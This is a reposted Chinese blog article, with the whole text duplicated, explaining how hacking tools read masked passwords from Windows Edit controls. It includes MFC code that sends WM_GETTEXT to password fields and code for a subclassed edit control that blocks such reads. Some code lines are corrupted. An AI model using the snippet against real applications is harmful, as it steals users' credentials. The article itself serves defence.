駭客非法探取密碼的原理及安全防範(轉)
駭客非法探取密碼的原理及安全防範(轉)[@more@] 一、非法獲取Password的原理:
Edit控制元件是Windows的一個標準控制元件,當把其Password屬性設為True時,就會將輸入的內容遮蔽為星號,從而達到保護的目的。雖然我們看來都是星號,但程式中的Edit控制元件實際仍是使用者輸入的密碼,應用程式可以獲取該控制元件中的密碼,其他應用程式也可以透過向其傳送WM_GETTEXT或EM_GETLINE訊息來獲取Edit控制元件中的內容。駭客程式正是利用Edit控制元件的這個特性,當發現當前探測的視窗是Edit控制元件並且具有ES_PASSWORD屬性時,則透過SendMessage向此視窗傳送WM_GETTEXT或EM_GETLINE訊息,這樣Edit框中的內容就一目瞭然了。
二、駭客軟體工作方法
首先要取得當前的視窗,並判斷是否是Edit控制元件,一般多透過滑鼠來指定要探測的視窗,例如在WM_MOUSEMOVE訊息的響應函式中進行判斷,現列舉程式碼片段如下:
//將客戶座標轉換成螢幕座標
ClientToScreen(&point);
//返回一個包含指定螢幕座標點的視窗
CWnd* pWnd = CWnd::WindowFromPoint(point);
if (pWnd)
{
//獲取視窗控制程式碼
HWND hwndCurr = pWnd->GetSafeHwnd();
if ((::GetWindowThreadProcessId (GetSafeHwnd(), NULL)) !=
(::GetWindowThreadProcessId (hwndCurr, NULL)))
{
char lpClassName[255];
//獲取類名
if (::GetClassName(hwndCurr, lpClassName, 255))
{
//判斷是否是Edit控制元件
if (0 == m_strWndClass.CompareNoCase("EDIT"))
{
//獲取視窗風格
LONG lStyle = ::GetWindowLong(hwndCurr, GWL_STYLE);
//如果設定了ES_PASSWORD屬性
if (lStyle & ES_PASSWORD)
{
char szText[255];
//透過掌握的控制程式碼hwndCurr向此控制元件傳送WM_GETTEXT訊息
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);
//密碼已儲存在szText中
m_strPassword = szText;
}
}
}
}
}
上述程式碼中值得注意的有以下幾個關鍵地方:
ClientToScreen(&point);
CWnd* pWnd = CWnd::WindowFromPoint(point);
HWND hwndCurr = pWnd->GetSafeHwnd();
這三句程式碼可以獲取當前滑鼠位置所在視窗的視窗控制程式碼,在SendMessage中要用到的。?
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);
這便是真正起作用的SendMessage了,其第一個引數指定了要接收訊息的視窗控制程式碼,我們已經透過上面的程式碼獲取到了,第二個引數就是讓Edit控制元件返回字元的WM_GETTEXT訊息了,並將得到的內容儲存在szText中。
三、防範措施
既然我們搞清除了駭客軟體普遍採取的手法,那我們自然能制訂出一套防範其攻擊的措施來。下面我們就要對Password進行保護。從以上分析我們可以看出:Edit控制元件的漏洞主要在於沒有對傳送WM_GETTEXT或EM_GETLINE訊息者的身份進行檢查,只要能找到Edit視窗控制程式碼,任何程式都可獲取其內容。所以必須要對傳送訊息者的身份進行驗證,這裡給出一種方法來驗證傳送訊息者的身份是否合法:
1.建立新CEdit類
從CEdit繼承一個子類CPasswordEdit,申明全域性變數g_bSenderIdentity表明訊息傳送者的身份: BOOL g_bSenderIdentity;
然後響應CWnd的虛擬函式DefWindowProc,在這個回撥函式中進行身份驗證:
LRESULTCPasswordEdit:efWindowProc (UINTmessage,WPARAMwParam,LPARAMlParam)
{ //對Edit的內容獲取必須透過以下兩個訊息之一
if((message==WM_GETTEXT)
||(message==EM_GETLINE)) { //檢查是否為合法
if(!g_bSenderIdentity)
{
//非法獲取,顯示資訊
AfxMessageBox(_T ("報告:正在試圖竊取密碼!"));
return 0;
}
//合法獲取
g_bSenderIdentity=FALSE;
}
return CEdit:efWindowProc (message,wParam,lParam);
}
2.在資料輸入對話方塊中做些處理
在對話方塊中申明一個類成員m_edtPassword:??CpasswordEdit m_edtPassword;
然後在對話方塊的OnInitDialog()中加入下列程式碼: m_edtPassword.SubclassDlgItem(IDC_EDIT_PASSWORD,this);
將控制與新類做關聯。之後要在對話方塊的資料交換函式中將身份設為合法: void CDlgInput:oDataExchange (CDataExchange*pDX)
{ //如果獲取資料
//注意:對於CPropertyPage類這裡不需要if (pDX->m_bSaveAndValidate)條件
if(pDX->m_bSaveAndValidate)
{
g_bSenderIdentity=TRUE;
}
CDialog:oDataExchange(pDX);
//{{AFX_DATA_MAP(CDlgInput)
DDX_Text (pDX,IDC_EDIT_PASSWORD,m_sPassword); //}}AFX_DATA_MAP
}
這樣,Password輸入框就擁有了合法身份,會受到保護。
結論:
以上的方法僅針對VC程式,對於其他語言如VB、Delphi等語言,需要藉助VC做一個Password的ActiveX控制元件,實現方法與上述方法基本類似。以上程式均用VisualC++6.0編制除錯透過。
Edit控制元件是Windows的一個標準控制元件,當把其Password屬性設為True時,就會將輸入的內容遮蔽為星號,從而達到保護的目的。雖然我們看來都是星號,但程式中的Edit控制元件實際仍是使用者輸入的密碼,應用程式可以獲取該控制元件中的密碼,其他應用程式也可以透過向其傳送WM_GETTEXT或EM_GETLINE訊息來獲取Edit控制元件中的內容。駭客程式正是利用Edit控制元件的這個特性,當發現當前探測的視窗是Edit控制元件並且具有ES_PASSWORD屬性時,則透過SendMessage向此視窗傳送WM_GETTEXT或EM_GETLINE訊息,這樣Edit框中的內容就一目瞭然了。
二、駭客軟體工作方法
首先要取得當前的視窗,並判斷是否是Edit控制元件,一般多透過滑鼠來指定要探測的視窗,例如在WM_MOUSEMOVE訊息的響應函式中進行判斷,現列舉程式碼片段如下:
//將客戶座標轉換成螢幕座標
ClientToScreen(&point);
//返回一個包含指定螢幕座標點的視窗
CWnd* pWnd = CWnd::WindowFromPoint(point);
if (pWnd)
{
//獲取視窗控制程式碼
HWND hwndCurr = pWnd->GetSafeHwnd();
if ((::GetWindowThreadProcessId (GetSafeHwnd(), NULL)) !=
(::GetWindowThreadProcessId (hwndCurr, NULL)))
{
char lpClassName[255];
//獲取類名
if (::GetClassName(hwndCurr, lpClassName, 255))
{
//判斷是否是Edit控制元件
if (0 == m_strWndClass.CompareNoCase("EDIT"))
{
//獲取視窗風格
LONG lStyle = ::GetWindowLong(hwndCurr, GWL_STYLE);
//如果設定了ES_PASSWORD屬性
if (lStyle & ES_PASSWORD)
{
char szText[255];
//透過掌握的控制程式碼hwndCurr向此控制元件傳送WM_GETTEXT訊息
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);
//密碼已儲存在szText中
m_strPassword = szText;
}
}
}
}
}
上述程式碼中值得注意的有以下幾個關鍵地方:
ClientToScreen(&point);
CWnd* pWnd = CWnd::WindowFromPoint(point);
HWND hwndCurr = pWnd->GetSafeHwnd();
這三句程式碼可以獲取當前滑鼠位置所在視窗的視窗控制程式碼,在SendMessage中要用到的。?
::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);
這便是真正起作用的SendMessage了,其第一個引數指定了要接收訊息的視窗控制程式碼,我們已經透過上面的程式碼獲取到了,第二個引數就是讓Edit控制元件返回字元的WM_GETTEXT訊息了,並將得到的內容儲存在szText中。
三、防範措施
既然我們搞清除了駭客軟體普遍採取的手法,那我們自然能制訂出一套防範其攻擊的措施來。下面我們就要對Password進行保護。從以上分析我們可以看出:Edit控制元件的漏洞主要在於沒有對傳送WM_GETTEXT或EM_GETLINE訊息者的身份進行檢查,只要能找到Edit視窗控制程式碼,任何程式都可獲取其內容。所以必須要對傳送訊息者的身份進行驗證,這裡給出一種方法來驗證傳送訊息者的身份是否合法:
1.建立新CEdit類
從CEdit繼承一個子類CPasswordEdit,申明全域性變數g_bSenderIdentity表明訊息傳送者的身份: BOOL g_bSenderIdentity;
然後響應CWnd的虛擬函式DefWindowProc,在這個回撥函式中進行身份驗證:
LRESULTCPasswordEdit:efWindowProc (UINTmessage,WPARAMwParam,LPARAMlParam)
{ //對Edit的內容獲取必須透過以下兩個訊息之一
if((message==WM_GETTEXT)
||(message==EM_GETLINE)) { //檢查是否為合法
if(!g_bSenderIdentity)
{
//非法獲取,顯示資訊
AfxMessageBox(_T ("報告:正在試圖竊取密碼!"));
return 0;
}
//合法獲取
g_bSenderIdentity=FALSE;
}
return CEdit:efWindowProc (message,wParam,lParam);
}
2.在資料輸入對話方塊中做些處理
在對話方塊中申明一個類成員m_edtPassword:??CpasswordEdit m_edtPassword;
然後在對話方塊的OnInitDialog()中加入下列程式碼: m_edtPassword.SubclassDlgItem(IDC_EDIT_PASSWORD,this);
將控制與新類做關聯。之後要在對話方塊的資料交換函式中將身份設為合法: void CDlgInput:oDataExchange (CDataExchange*pDX)
{ //如果獲取資料
//注意:對於CPropertyPage類這裡不需要if (pDX->m_bSaveAndValidate)條件
if(pDX->m_bSaveAndValidate)
{
g_bSenderIdentity=TRUE;
}
CDialog:oDataExchange(pDX);
//{{AFX_DATA_MAP(CDlgInput)
DDX_Text (pDX,IDC_EDIT_PASSWORD,m_sPassword); //}}AFX_DATA_MAP
}
這樣,Password輸入框就擁有了合法身份,會受到保護。
結論:
以上的方法僅針對VC程式,對於其他語言如VB、Delphi等語言,需要藉助VC做一個Password的ActiveX控制元件,實現方法與上述方法基本類似。以上程式均用VisualC++6.0編制除錯透過。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10617731/viewspace-961443/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 非法探取密碼的原理及其防範 (轉)密碼
- 防止密碼被非法獲取 (轉)密碼
- 網路安全防範體系及設計上的原則(轉)
- 駭客偷你的密碼幹什麼?密碼
- 間諜軟體的入侵原理及防範辦法(轉)
- 密碼管理規範密碼
- 伺服器漏洞的安全防範伺服器
- 駭客能篡改WiFi密碼,源於存在漏洞WiFi密碼
- 範寶興:密碼匙的應用密碼
- 安全防護密碼學之網站安全公司密碼學網站
- 與駭客過招自我防範十大策略 (轉)
- 密碼加SALT原理密碼
- 五種windows密碼設定及破解(轉)Windows密碼
- 網橋原理及原始碼詳解(轉)原始碼
- 針對LINUX主機談---我的防範駭客經驗(轉)Linux
- 安全防範:徹底擊破威脅你的惡意網頁(轉)網頁
- Android App安全防範措施的小結AndroidAPP
- BTC-密碼學原理密碼學
- 內部 API 的安全防護怎麼搞?密碼學中有答案API密碼學
- 駭客找到iOS 11鎖屏密碼漏洞:破解iOS鎖屏密碼跟玩一樣iOS密碼
- Web安全防範-----防止重放攻擊Web
- 交換網路安全防範系列二之DHCP攻擊的防範
- 顯示密碼編輯框中的密碼 (轉)密碼
- 比特幣中的密碼學原理比特幣密碼學
- 轉_Buffer Cache的原理及使用
- expdp/impdp的原理及使用(轉)
- 每日安全資訊:NCSC 釋出最常被駭客入侵的密碼列表密碼
- 指令碼範例(轉)指令碼
- [Linux]使用者及密碼相關命令(轉)Linux密碼
- RSA加密原理&密碼學&HASH加密密碼學
- 如何在命令列上建立符合特定規範的密碼?命令列密碼
- AQS的原理及原始碼分析AQS原始碼
- Java 程式編碼的規範(轉)Java
- AccesS密碼的打擊 (轉)密碼
- 【密碼學原理】流密碼和RC4演算法密碼學演算法
- 網站Web伺服器安全防範的乾貨網站Web伺服器
- 常見web漏洞及防範(轉)Web
- 1、Windows下安裝mysql-8.0.12及修改初始密碼WindowsMySql密碼